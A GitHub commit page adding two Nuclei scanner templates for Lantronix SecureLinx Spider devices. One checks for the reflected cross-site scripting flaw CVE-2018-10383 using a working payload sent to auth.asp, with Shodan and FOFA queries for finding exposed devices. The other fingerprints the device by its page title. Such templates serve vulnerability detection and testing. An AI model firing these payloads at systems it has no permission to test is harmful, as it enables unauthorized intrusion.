Skip to content

Commit

Permalink
Auto Update Nuclei [Thu Nov 7 18:26:19 UTC 2024] :robot:
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Nov 7, 2024
1 parent 2a9fe50 commit eee7b7c
Show file tree
Hide file tree
Showing 2 changed files with 74 additions and 0 deletions.
52 changes: 52 additions & 0 deletions plugins/lantronix/securelinx_spider_firmware/CVE-2018-10383.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,52 @@
id: CVE-2018-10383

info:
name: Lantronix SecureLinx Spider (SLS) 2.2+ - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Lantronix SecureLinx Spider (SLS) 2.2+ devices have XSS in the auth.asp login page.
reference:
- https://github.com/grymer/CVE/blob/master/CVE-2018-10383.md
- https://nvd.nist.gov/vuln/detail/CVE-2018-10383
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-10383
cwe-id: CWE-79
cpe: cpe:2.3:o:lantronix:securelinx_spider_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: lantronix
product: securelinx_spider_firmware
shodan-query: title:"Lantronix"
fofa-query: title="Lantronix"
tags: cve,cve2022,lantronix,securelinx,sls,xss

flow: http(1) && http(2)

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_any(body, "<title>Lantronix", "Lantronix, Inc")'
internal: true

- raw:
- |
GET /auth.asp?nickname=%22%3E%3Cstyle%20onload%3D%22alert(document.domain)%22%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "><style onload=\"alert(document.domain)\">")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100d44e19f3cf10cba5b9aa8737e49a01705ffe32020f97d0fceccd578247e42ce102207f9a12a3aa0265f1eb6150c46f692e4f3ee013b973b7975da1cf51b76fd5bca3:922c64590222798bb761d5b6d8e72950
22 changes: 22 additions & 0 deletions web-fingerprint/lantronix/securelinx_spider_firmware.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,22 @@
id: securelinx_spider_firmware
info:
name: securelinx_spider_firmware
author: cn-kali-team
tags: detect,tech,securelinx_spider_firmware
severity: info
metadata:
fofa-query:
- title="lantronix"
product: securelinx_spider_firmware
shodan-query:
- title:"lantronix"
vendor: lantronix
verified: true
http:
- method: GET
path:
- '{{BaseURL}}/'
matchers:
- type: regex
regex:
- (?mi)<title[^>]*>lantronix.*?</title>

0 comments on commit eee7b7c

Please sign in to comment.